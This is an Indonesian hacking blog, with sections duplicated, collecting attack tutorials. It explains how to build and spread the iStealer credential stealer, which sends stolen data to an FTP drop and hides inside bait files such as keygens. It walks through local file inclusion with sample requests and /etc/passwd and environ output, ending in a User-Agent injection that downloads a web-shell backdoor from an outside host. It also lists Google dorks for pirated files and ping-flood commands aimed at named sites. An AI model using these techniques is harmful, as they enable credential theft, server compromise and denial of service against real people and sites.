ne program es-telernya
http://www.4shared.com/file/a5QhIZi3/IStealer_40.htm
caranya
habis di download extract
terus Klik 2 kali file iLoader
tapi sebelumnya kita aktifin dl ocxnya... klik di folder ocx terus klik register file
terus kalau udah muncul gambar seperti dibawah ne
[Image: 91737052.jpg]
terus selanjutnya kita daftar di http://www.drivehq.com kalau udah selesai regis nte login terus buat folder baru stealer. Untuk Host,isikan http://ftp.drivehq.com .terus untuk login,masukkin username ama password nte.Untuk directory,isikan dengan /stealer .
kalau udah selesai semua klik tombol Test FTP,jika dia pernyataan sukses,maka kita sudah berhasil men setting stealer ini.
next..sekarang selanjutnya kita download file2 menarik seperti keygen,atau apa yang ngebuat orang tertarik ngedownload...(apalagi foto ane yang di downloadnya). oke kalau udah selesai nyari file menariknya sekarng langkah selanjutnya kita balik ke program es-tellernya .
Dibagian binder options,centang pilihan bind with another file,lalu masukin file yang kita download,setelah itu dibagian icon tinggal pilih sesuai selera
kalau udah selesai dimasukin filenya lalu tekan tombol build.
nah kalau mau lihat hasilnya cari di folder icon..
nanti ada exe yang telah kita build tadi..
langkah selanjutnya tinggal kita upload ama soceng dikit..buat pada ngedownloadin file kita,,, kalau mereke ngedownload. terus ngejalanin file kita..maka akan ada laporannya ke ftp kita yang tadi kita buat......
semoga sukses
mw hacking facebook klik link dibawah ini
free download
Saturday, 14 August 2010
Saturday, 10 July 2010
tutorial Upload Shell Target LFI Dengan Tamper Data
Thumbs Up Tutorial Upload Shell Target LFI Dengan Tamper Data
Sebelum nya sorry klw udah ada threat yg sama seperti ini..
tapi saya memberanikan diri untuk membuat threat tutorial ini..setelah saya meminta izin sebelum nya , dan salah satu moderator telah mengijinkan..
ok kita langsung saja..
yang mau saya share di sini ialah tutorial or cara mengupload shell dari target LFI dengan Tamper Data.
########################################
fucking the Web Apps [LFI attack edition]
____ __ __ __
/\ _`\ /\ \ __ /\ \__/\ \
\ \ \L\_\__ __ ___\ \ \/'\ /\_\ ___ __ \ \ ,_\ \ \___ __
\ \ _\/\ \/\ \ /'___\ \ , < \/\ \ /' _ `\ /'_ `\ \ \ \/\ \ _ `\ /'__`\
\ \ \/\ \ \_\ \/\ \__/\ \ \\`\\ \ \/\ \/\ \/\ \L\ \ \ \ \_\ \ \ \ \/\ __/
\ \_\ \ \____/\ \____\\ \_\ \_\ \_\ \_\ \_\ \____ \ \ \__\\ \_\ \_\ \____\
\/_/ \/___/ \/____/ \/_/\/_/\/_/\/_/\/_/\/___L\ \ \/__/ \/_/\/_/\/____/
/\____/
\_/__/
__ __ __ ______ Author: eidelweiss
/\ \ __/\ \ /\ \ /\ _ \
\ \ \/\ \ \ \ __\ \ \____ \ \ \L\ \ _____ _____ ____
\ \ \ \ \ \ \ /'__`\ \ '__`\ \ \ __ \/\ '__`\/\ '__`\ /',__\
\ \ \_/ \_\ \/\ __/\ \ \L\ \ \ \ \/\ \ \ \L\ \ \ \L\ \/\__, `\
\ `\___x___/\ \____\\ \_,__/ \ \_\ \_\ \ ,__/\ \ ,__/\/\____/
'\/__//__/ \/____/ \/___/ \/_/\/_/\ \ \/ \ \ \/ \/___/
\ \_\ \ \_\
\/_/ \/_/
-=[ upload Shell via Target LFI dengan Tamper Data ]=-
1 - Pendahuluan
2 - Mencari Target LFI
3 - Memeriksa apakah proc / self / environ dapat diakses
4 - Mengupload code shell injection
5 - Akses shell or backdoor kita
=[1]= Pendahuluan
Dalam tutorial ini saya akan coba menunjukkan bagaimana Mencari or mendapatkan target LFI , setelah itu bagai bagaimana kita memanfaat kan target tersebut dan mengupload shell injection (backdoor) kedalam nya.
=[2]= Mencari Target LFI
=> Sekarang saya akan coba memberikan sample or contoh bagaimana cara menemukan target LFI , lets check it.
example: http://www.target.com/index.php?page=blablabla
=> sekarang kita coba mengganti file setelah ?page= (blablabla) dengan ../
example: http://www.target.com/index.php?page=../
Jika kita mendapatkan pesan error seperti ini:
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1330
website or target tersebut kemungkinan besar can be attack with LFI ;)
untuk memastikan nya kita masuk ke step berikut nya yaitu mencoba meng access file /etc/passwd , for this step Lets make a request:
example: http://www.target.com/index.php?page=../...etc/passwd
jika kita masih mendapat kan pesan error yg sama seperti di atas , berarti kita perlu or coba menambahkan beberapa directory (../../) lagi sampai pesan error hilang dan kita success meng access or menampilkan isi dari file /etc/passwd
contoh klw success akan muncul seperti ini: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin
=[3]=Memeriksa apakah proc/self/environ dapat diakses
sekarang mari kita periksa atau check apakah proc/self/environ dapat di access dengan cara mengganti /etc/passwd dengan proc/self/environ
contoh: http://www.target.com/index.php?page=../...etc/passwd <= change etc/passwd with proc/self/environ
it will be like this: http://www.target.com/index.php?page=../...lf/environ
jika success atau proc/self/environ dapat di access , maka kita akan mendapat pesan seperti berikut:
DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at http://www.website.com Port 80
jika gagal atau blank atau error berarti proc/self/environ tidak dapat di access
NB: kemungkinan lain yg menyebab kan proc/self/environ tidak dapat di access ialah web or target kita menggunakan OS (operating system) FreeBSD
=[4]= Mengupload code shell injection (backdoor)
Di step ini kita akan mencoba mengupload shell injection (backdoor) kita ke dalam target yg tadi atau target yg proc/self/environ dapat di access.
Bagaimana caranya ?
Di sinilah peran Tamper data di perlukan.Apa itu Tamper Data ?
NB: Tamper data ialah salah satu Add-ons pada browser mozila yg dapat kita gunakan untuk mengganti user agent atau HTTP Header.
Bagaimana cara menggunakan nya ?
Download dan install terlebih dahulu Tamper Data pada Add-ons mozila anda download here => https://addons.mozilla.org/en-US/firefox/addon/966
setelah tamper data di install , buka tamper data dan pada User-Agent masukan command code sebagai berikut:
NB: arizonafusion dapat anda ganti dengan link injection anda sendiri jika anda punya atau tidak ingin memakai injection tersebut :)
command code tersebut akan men-download file r58.txt dari arizonafusion.com dan otomatis tersimpan dengan nama shell.php.
jika tidak bekerja coba exec () karena sistem () dapat dinonaktifkan pada webserver dari php.ini
=[5]= Check or Akses shell backdoor kita
Sekarang mari kita periksa apakah script shell (backdoor) kita berhasil atau tersedia pada web target tadi dengan cara membuka:
www.target.com/shell.php
Jika success maka kita akan melihat tampilan backdoor shell kita ;)
This Tutorial is writen for educational purpose only , Author will be not responsible if any damage.
Greats: JosS (hack0wn), h4cky0u.org , yogyacarderlink team , AL-MARHUM , sp3x (securityreason) , r0073r & 0x1D (inj3ct0r) , [D]eal [C]yber , exploit-db
Sebelum nya sorry klw udah ada threat yg sama seperti ini..
tapi saya memberanikan diri untuk membuat threat tutorial ini..setelah saya meminta izin sebelum nya , dan salah satu moderator telah mengijinkan..
ok kita langsung saja..
yang mau saya share di sini ialah tutorial or cara mengupload shell dari target LFI dengan Tamper Data.
########################################
fucking the Web Apps [LFI attack edition]
____ __ __ __
/\ _`\ /\ \ __ /\ \__/\ \
\ \ \L\_\__ __ ___\ \ \/'\ /\_\ ___ __ \ \ ,_\ \ \___ __
\ \ _\/\ \/\ \ /'___\ \ , < \/\ \ /' _ `\ /'_ `\ \ \ \/\ \ _ `\ /'__`\
\ \ \/\ \ \_\ \/\ \__/\ \ \\`\\ \ \/\ \/\ \/\ \L\ \ \ \ \_\ \ \ \ \/\ __/
\ \_\ \ \____/\ \____\\ \_\ \_\ \_\ \_\ \_\ \____ \ \ \__\\ \_\ \_\ \____\
\/_/ \/___/ \/____/ \/_/\/_/\/_/\/_/\/_/\/___L\ \ \/__/ \/_/\/_/\/____/
/\____/
\_/__/
__ __ __ ______ Author: eidelweiss
/\ \ __/\ \ /\ \ /\ _ \
\ \ \/\ \ \ \ __\ \ \____ \ \ \L\ \ _____ _____ ____
\ \ \ \ \ \ \ /'__`\ \ '__`\ \ \ __ \/\ '__`\/\ '__`\ /',__\
\ \ \_/ \_\ \/\ __/\ \ \L\ \ \ \ \/\ \ \ \L\ \ \ \L\ \/\__, `\
\ `\___x___/\ \____\\ \_,__/ \ \_\ \_\ \ ,__/\ \ ,__/\/\____/
'\/__//__/ \/____/ \/___/ \/_/\/_/\ \ \/ \ \ \/ \/___/
\ \_\ \ \_\
\/_/ \/_/
-=[ upload Shell via Target LFI dengan Tamper Data ]=-
1 - Pendahuluan
2 - Mencari Target LFI
3 - Memeriksa apakah proc / self / environ dapat diakses
4 - Mengupload code shell injection
5 - Akses shell or backdoor kita
=[1]= Pendahuluan
Dalam tutorial ini saya akan coba menunjukkan bagaimana Mencari or mendapatkan target LFI , setelah itu bagai bagaimana kita memanfaat kan target tersebut dan mengupload shell injection (backdoor) kedalam nya.
=[2]= Mencari Target LFI
=> Sekarang saya akan coba memberikan sample or contoh bagaimana cara menemukan target LFI , lets check it.
example: http://www.target.com/index.php?page=blablabla
=> sekarang kita coba mengganti file setelah ?page= (blablabla) dengan ../
example: http://www.target.com/index.php?page=../
Jika kita mendapatkan pesan error seperti ini:
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1330
website or target tersebut kemungkinan besar can be attack with LFI ;)
untuk memastikan nya kita masuk ke step berikut nya yaitu mencoba meng access file /etc/passwd , for this step Lets make a request:
example: http://www.target.com/index.php?page=../...etc/passwd
jika kita masih mendapat kan pesan error yg sama seperti di atas , berarti kita perlu or coba menambahkan beberapa directory (../../) lagi sampai pesan error hilang dan kita success meng access or menampilkan isi dari file /etc/passwd
contoh klw success akan muncul seperti ini: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin
=[3]=Memeriksa apakah proc/self/environ dapat diakses
sekarang mari kita periksa atau check apakah proc/self/environ dapat di access dengan cara mengganti /etc/passwd dengan proc/self/environ
contoh: http://www.target.com/index.php?page=../...etc/passwd <= change etc/passwd with proc/self/environ
it will be like this: http://www.target.com/index.php?page=../...lf/environ
jika success atau proc/self/environ dapat di access , maka kita akan mendapat pesan seperti berikut:
DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at http://www.website.com Port 80
jika gagal atau blank atau error berarti proc/self/environ tidak dapat di access
NB: kemungkinan lain yg menyebab kan proc/self/environ tidak dapat di access ialah web or target kita menggunakan OS (operating system) FreeBSD
=[4]= Mengupload code shell injection (backdoor)
Di step ini kita akan mencoba mengupload shell injection (backdoor) kita ke dalam target yg tadi atau target yg proc/self/environ dapat di access.
Bagaimana caranya ?
Di sinilah peran Tamper data di perlukan.Apa itu Tamper Data ?
NB: Tamper data ialah salah satu Add-ons pada browser mozila yg dapat kita gunakan untuk mengganti user agent atau HTTP Header.
Bagaimana cara menggunakan nya ?
Download dan install terlebih dahulu Tamper Data pada Add-ons mozila anda download here => https://addons.mozilla.org/en-US/firefox/addon/966
setelah tamper data di install , buka tamper data dan pada User-Agent masukan command code sebagai berikut:
NB: arizonafusion dapat anda ganti dengan link injection anda sendiri jika anda punya atau tidak ingin memakai injection tersebut :)
command code tersebut akan men-download file r58.txt dari arizonafusion.com dan otomatis tersimpan dengan nama shell.php.
jika tidak bekerja coba exec () karena sistem () dapat dinonaktifkan pada webserver dari php.ini
=[5]= Check or Akses shell backdoor kita
Sekarang mari kita periksa apakah script shell (backdoor) kita berhasil atau tersedia pada web target tadi dengan cara membuka:
www.target.com/shell.php
Jika success maka kita akan melihat tampilan backdoor shell kita ;)
This Tutorial is writen for educational purpose only , Author will be not responsible if any damage.
Greats: JosS (hack0wn), h4cky0u.org , yogyacarderlink team , AL-MARHUM , sp3x (securityreason) , r0073r & 0x1D (inj3ct0r) , [D]eal [C]yber , exploit-db
google hack
Trik Dasar Melakukan Google Hacking Untuk Mendapatkan File Apapun Secara Gratis
Paman Google
Sepintas di dunia internet, banyak sekali kegiatan hacking lewat google untuk mendapatkan file tersembunyi. FIle - file tersebut seharusnya dirahasiakan dan tidak boleh disebarkan. Tetapi, melalui google hacking itu semua dengan mudah kita ambil. Memang Google satu satunya search engine top sejagad raya ! Disini, saya hanya akan membantu anda dengan cara - cara dasar untuk hacking google supaya mendapatkan file apapun secara gratis. Tidak cara yang susah susah, karena berbahaya bagi kanker, janin, kelamin, kehamilan dan lainnya. Nah, file apa saja yang bisa kamu dapatkan? contohnya adalah file video, music, ebook, film, dokumen, arsip zip dan masih banyak lainnya. INgat..ingat,,,hanya trik dasar saja ya ! Kalo mau yang profesional bisa dikembangkan sendiri atau berguru padaku. Baca selanjutnya…
Berikut cara caranya :
Googling E-Book.
+(”index of”) +(”/ebooks”|”/book”) +(chm|pdf|zip|rar) +apache
Adalah Query yang menghasilkan Index ebook di server yang berbasis
Apache
allinurl: +(rar|chm|zip|pdf|tgz|lit) judul buku
Ganti “judul buku” dengan buku yang ingin dicari. Jika ingin mencari
“Wiro Sableng”, ganti “judul buku” dengan Wiro Sableng. Cara ini
digunakan jika benar-benar mengetahui judul buku yang dicari.
Googling Warez.
“parent directory ” Xvid -xxx -html -htm -php -shtml -opendivx -md5
-md5sums
“parent directory ” MP3 -xxx -html -htm -php -shtml -opendivx -md5
-md5sums
“parent directory ” applications -xxx -html -htm -php -shtml -opendivx
-md5 -md5sums
“parent directory ” Gamez -xxx -html -htm -php -shtml -opendivx -md5
-md5sums
“parent directory ” DVDRip -xxx -html -htm -php -shtml -opendivx -md5
-md5sums
Ganti Kata yang tebal dengan query.
Contoh, jika ingin mencari Limewire maka ganti “applications” dengan
Limewire. jika ingin mencari lagu dari Deep Purple berjudul Child In
Time, ganti “MP3? dengan Child in Time atau jika ingin mencari
lagu-lagu
Deep Purple tinggal ganti “MP3? dengan Deep Purple.
Googling MP3
?intitle:index.of? mp3
Cara lain untuk mencari MP3 di google adalah menggunakan Query ini.
Setelah MP3 kasih apa yang pengen dicari.
Contoh: Jika ingin mencari Led Zeppelin maka query-nya akan seperti ini
?intitle:index.of? mp3 led zeppelin
Googling file di megaupload
Untuk mencari File Video ketik :
avi|mpg|mpeg|wmv|rmvb site:megaupload.com
Untuk mencari File musik ketik :
mp3|ogg|wma site:megaupload.com
Untuk mencari archive dan program ketik :
zip|rar|exe site:megaupload.com
Untuk mencari ebooks ketik :
pdf|rar|zip|doc|lit site:megaupload.com
Googling file di rapidshare.de
Untuk mencari File Video ketik :
avi|mpg|mpeg|wmv|rmvb site:rapidshare.de
Untuk mencari File musik ketik :
mp3|ogg|wma site:rapidshare.de
Untuk mencari archive dan program ketik :
zip|rar|exe site:rapidshare.de
Untuk mencari ebooks ketik :
pdf|doc|lit|rar|zip site:rapidshare.de
Untuk Googling di Megaupload dan rapidshare bisa langsung meletakkan apa
yang diinginkan di bagian pertama.
Contoh: Jika ingin mencari DA VINCI CODE ebook gunakan query ini
da vinci code pdf|doc|lit|rar|zip site:rapidshare.de
(ini jika kita benar-benar tahu judul bukunya.
DAN UNTUK GOOGLE HACKING LAINNYA :
1. Ketikkan URL atau kriteria pencarian setelah titik dua.
2. Jangan ada spasi antara perintah dan istilah.
//////////////////////////////////////////////////////////
”””””””””””””””””””””””””””””
Perintah ext: [Mencari file tipe tertentu.]
exp = “ext:doc”
”””””””””””””””””””””””””””””
Perintah related: [Menampilkan website dengan tema serupa.]
exp = “related:yahoo.com”
”””””””””””””””””””””””””””””
Perintah site: [Menampilkan sub-site.]
exp = “site:yahoo.com”
”””””””””””””””””””””””””””””
Perintah allinurl: [Menampilkan semua URL.]
exp = “allinurl:yahoo”
”””””””””””””””””””””””””””””
Perintah allintitle: [Menampilkan semua istilah baris judul.]
exp = “allintitle:yahoo.com”
”””””””””””””””””””””””””””””
Perintah define: [Menjelaskan istilah.]
exp = “define:virus”
”””””””””””””””””””””””””””””
Perintah link: [Menampilkan popularitas website.]
exp = “link:namahomepage”
”””””””””””””””””””””””””””””
Perintah filetype:torrent [Menampilkan file tipe tertentu.]
exp = “batman filetype:torrent”
”””””””””””””””””””””””””””””
Perintah movie: [Menampilkan info film.]
exp = “movie:batman”
”””””””””””””””””””””””””””””
Perintah daterange: [Menampilkan website yang baru diindeks.]
exp = “daterange:(2006-01-01)(2006-02-02)”
”””””””””””””””””””””””””””””
//////////////////////////////////////////////////////////
Paman Google
Sepintas di dunia internet, banyak sekali kegiatan hacking lewat google untuk mendapatkan file tersembunyi. FIle - file tersebut seharusnya dirahasiakan dan tidak boleh disebarkan. Tetapi, melalui google hacking itu semua dengan mudah kita ambil. Memang Google satu satunya search engine top sejagad raya ! Disini, saya hanya akan membantu anda dengan cara - cara dasar untuk hacking google supaya mendapatkan file apapun secara gratis. Tidak cara yang susah susah, karena berbahaya bagi kanker, janin, kelamin, kehamilan dan lainnya. Nah, file apa saja yang bisa kamu dapatkan? contohnya adalah file video, music, ebook, film, dokumen, arsip zip dan masih banyak lainnya. INgat..ingat,,,hanya trik dasar saja ya ! Kalo mau yang profesional bisa dikembangkan sendiri atau berguru padaku. Baca selanjutnya…
Berikut cara caranya :
Googling E-Book.
+(”index of”) +(”/ebooks”|”/book”) +(chm|pdf|zip|rar) +apache
Adalah Query yang menghasilkan Index ebook di server yang berbasis
Apache
allinurl: +(rar|chm|zip|pdf|tgz|lit) judul buku
Ganti “judul buku” dengan buku yang ingin dicari. Jika ingin mencari
“Wiro Sableng”, ganti “judul buku” dengan Wiro Sableng. Cara ini
digunakan jika benar-benar mengetahui judul buku yang dicari.
Googling Warez.
“parent directory ” Xvid -xxx -html -htm -php -shtml -opendivx -md5
-md5sums
“parent directory ” MP3 -xxx -html -htm -php -shtml -opendivx -md5
-md5sums
“parent directory ” applications -xxx -html -htm -php -shtml -opendivx
-md5 -md5sums
“parent directory ” Gamez -xxx -html -htm -php -shtml -opendivx -md5
-md5sums
“parent directory ” DVDRip -xxx -html -htm -php -shtml -opendivx -md5
-md5sums
Ganti Kata yang tebal dengan query.
Contoh, jika ingin mencari Limewire maka ganti “applications” dengan
Limewire. jika ingin mencari lagu dari Deep Purple berjudul Child In
Time, ganti “MP3? dengan Child in Time atau jika ingin mencari
lagu-lagu
Deep Purple tinggal ganti “MP3? dengan Deep Purple.
Googling MP3
?intitle:index.of? mp3
Cara lain untuk mencari MP3 di google adalah menggunakan Query ini.
Setelah MP3 kasih apa yang pengen dicari.
Contoh: Jika ingin mencari Led Zeppelin maka query-nya akan seperti ini
?intitle:index.of? mp3 led zeppelin
Googling file di megaupload
Untuk mencari File Video ketik :
avi|mpg|mpeg|wmv|rmvb site:megaupload.com
Untuk mencari File musik ketik :
mp3|ogg|wma site:megaupload.com
Untuk mencari archive dan program ketik :
zip|rar|exe site:megaupload.com
Untuk mencari ebooks ketik :
pdf|rar|zip|doc|lit site:megaupload.com
Googling file di rapidshare.de
Untuk mencari File Video ketik :
avi|mpg|mpeg|wmv|rmvb site:rapidshare.de
Untuk mencari File musik ketik :
mp3|ogg|wma site:rapidshare.de
Untuk mencari archive dan program ketik :
zip|rar|exe site:rapidshare.de
Untuk mencari ebooks ketik :
pdf|doc|lit|rar|zip site:rapidshare.de
Untuk Googling di Megaupload dan rapidshare bisa langsung meletakkan apa
yang diinginkan di bagian pertama.
Contoh: Jika ingin mencari DA VINCI CODE ebook gunakan query ini
da vinci code pdf|doc|lit|rar|zip site:rapidshare.de
(ini jika kita benar-benar tahu judul bukunya.
DAN UNTUK GOOGLE HACKING LAINNYA :
1. Ketikkan URL atau kriteria pencarian setelah titik dua.
2. Jangan ada spasi antara perintah dan istilah.
//////////////////////////////////////////////////////////
”””””””””””””””””””””””””””””
Perintah ext: [Mencari file tipe tertentu.]
exp = “ext:doc”
”””””””””””””””””””””””””””””
Perintah related: [Menampilkan website dengan tema serupa.]
exp = “related:yahoo.com”
”””””””””””””””””””””””””””””
Perintah site: [Menampilkan sub-site.]
exp = “site:yahoo.com”
”””””””””””””””””””””””””””””
Perintah allinurl: [Menampilkan semua URL.]
exp = “allinurl:yahoo”
”””””””””””””””””””””””””””””
Perintah allintitle: [Menampilkan semua istilah baris judul.]
exp = “allintitle:yahoo.com”
”””””””””””””””””””””””””””””
Perintah define: [Menjelaskan istilah.]
exp = “define:virus”
”””””””””””””””””””””””””””””
Perintah link: [Menampilkan popularitas website.]
exp = “link:namahomepage”
”””””””””””””””””””””””””””””
Perintah filetype:torrent [Menampilkan file tipe tertentu.]
exp = “batman filetype:torrent”
”””””””””””””””””””””””””””””
Perintah movie: [Menampilkan info film.]
exp = “movie:batman”
”””””””””””””””””””””””””””””
Perintah daterange: [Menampilkan website yang baru diindeks.]
exp = “daterange:(2006-01-01)(2006-02-02)”
”””””””””””””””””””””””””””””
//////////////////////////////////////////////////////////
Sunday, 4 July 2010
penerangan pada kaskus by yogyafree
[Trick] Cara melakukan DDoS Attack
Nah, agan-agan yang pernah atau sudah bergabung bersama KasKus sejak 2008, pastinya masih inget dong kalau kasKus pernah diserang ama yang satu ini, sehingga KasKus gak bisa diakses ( plus corupt ) yang dilakukan oleh oknum yogyaFree ( katanya ).
Untuk lebih jelasnya, bisa anda baca dibawah ini :
Penyerangan mengakibatkan thread-thread yang telah dibuat terpaksa dikunci (lock).
Pada tanggal 16—17 Mei 2008, Kaskus diserang menggunakan teknik DDoS (Distributed Denial of Service) oleh oknum yang diduga berasal dari komunitas YogyaFree. Serangan ini menyebabkan database Kaskus corrupt sehingga administrator terpaksa mengunci thread-thread yang ada.
Penyerangan tersebut diduga terkait dengan peristiwa perusakan (deface) situs YogyaFree beberapa hari sebelumnya. Penyerang yang mengklaim dirinya sebagai salah satu anggota Kaskus juga melontarkan celaan yang bernada mengejek di salah satu bagian forum YogyaFree. Hal tersebut membuat beberapa anggota YogyaFree berang, dan kemudian balik menyerang Kaskus dengan DDoS. Akibatnya, administrator Kaskus terpaksa mematikan server Kaskus.
Perang cyber antara kedua komunitas ini akhirnya selesai ketika kedua pengelola situs menandatangani memorandum online untuk menyudahkan pertikaian di antara keduanya. Pesan tersebut dipampang selama beberapa minggu di halaman situs masing-masing.
Meskipun kerusakan yang ditimbulkan oleh serangan ini cukup berat, administrator Kaskus menjanjikan bahwa Kaskus akan kembali normal pada bulan Juli 2008, seiring dengan diluncurkannya server baru Kaskus di gedung Cyber, Jakarta. Namun, ia juga mengatakan bahwa data-data yang akan dimunculkan kembali adalah data yang dimuat sebelum tahun 2008, sementara data yang dibuat selama tahun 2008 tidak dapat dimunculkan kembali.
Ditulis oleh template (Co-Admin KasKus dengan User ID 5)
nah, percaya atau nggak, hal ini bisa kita jalankan ( DDoS ) atau lakukan hanya dengan bermodalkan DOS ( sekarang disebut Comand Prompt atau CMD ) dan tanpa software-software yang harganya muaaahaaaaaal banget.
berikut ini Dino berikan cara-caranya ( Singkat mode : On )
Penjelasan da DDoS
Aksi Denial of Service adalah salah satu cara menghentikan atau mematikan sebuah service pada komputer atau server. Sebenarnya, teknik ini adalah teknik yang suaaaangat kuno sekali yang banyak dilakukan pada zaman purbakala. Namun, pada zaman sekarang, banyak sistem yang telah di Upgrade, maka, cara ini akan sangat susah sekali untuk dijalankan. saran saya, sebaliknya anda mencoba pada komputer atau website dalam sebuah jaringan dan diketahui spesifikasinya RENDAH (-an).
penambahan opsi l merupakan salah satu senjata Hacking yang digunakan dalam aktivitas hacking. Dengan huruf l (-l (el) ), maka, ukuran default buffer yang anda kirimkan adalah sebesar 32 bytes bisa diubah. dalam aksi hacking, apabila seseorang menggunakan nilai buffer yang sangat bueeesar sekali ( Seperti User YogyaFree ) tentu hal ini akan sangan berbahaya sekali, tentu hal ini akan sangat berbahaya pada komputer yang spesifikasinya rendah ( Seperti komputer pentium 2 ) terutama dalam sebuah jaringan. Efeknya akan langsung terlihat dan bekerja, yang berupa komputer atau website target bisa menjadi Hang.
Penulisannya adalah dengan mengetikan data ini didalam CMD atau DOS :
Ping -l ip-address/domain-target
sebagai contoh untuk domain target :
Ping -l www.google.co.id 100000
Contoh untuk domain IP address target :
Ping -l 216.239.61.104 100000
Proses ini akan mengirimkan data sebesar 100000 paket data ke target. Dimana hal ini lebih tinggi dibandingkan kapasitas TCP/IP Google yang hanya sebesar 90000 ( Contoh aja Gan ).
Perintah kedua yang digunakan dalam aksi DDoS ini adalah opsi -t. Penulisannya adalah : Ping -t ip-address/domain-target. ( Cara penggunaannya sama seperti -l )
Hal ini akan mengirimkan 32 bytes data ke target secara bertubi-tubi. Hal inilah yang menyebabkan komputer dengan spesifikasi Rendah akan menjadi hang atau Down. Pemberhentian ini hanya bisa dilakukan dengan menekan tombol Ctrl+C pada keyBoard anda.
Coba anda perhatikan gambar, perintah ping dilakukan secara terus menerus oleh Dino pada www.kaskus.us
Akan lebih parah lagi jika kedua opsi tersebut digabungkan menjadi satu :
Ping -t -l ip-address/domain-target
Nah, agan-agan yang pernah atau sudah bergabung bersama KasKus sejak 2008, pastinya masih inget dong kalau kasKus pernah diserang ama yang satu ini, sehingga KasKus gak bisa diakses ( plus corupt ) yang dilakukan oleh oknum yogyaFree ( katanya ).
Untuk lebih jelasnya, bisa anda baca dibawah ini :
Penyerangan mengakibatkan thread-thread yang telah dibuat terpaksa dikunci (lock).
Pada tanggal 16—17 Mei 2008, Kaskus diserang menggunakan teknik DDoS (Distributed Denial of Service) oleh oknum yang diduga berasal dari komunitas YogyaFree. Serangan ini menyebabkan database Kaskus corrupt sehingga administrator terpaksa mengunci thread-thread yang ada.
Penyerangan tersebut diduga terkait dengan peristiwa perusakan (deface) situs YogyaFree beberapa hari sebelumnya. Penyerang yang mengklaim dirinya sebagai salah satu anggota Kaskus juga melontarkan celaan yang bernada mengejek di salah satu bagian forum YogyaFree. Hal tersebut membuat beberapa anggota YogyaFree berang, dan kemudian balik menyerang Kaskus dengan DDoS. Akibatnya, administrator Kaskus terpaksa mematikan server Kaskus.
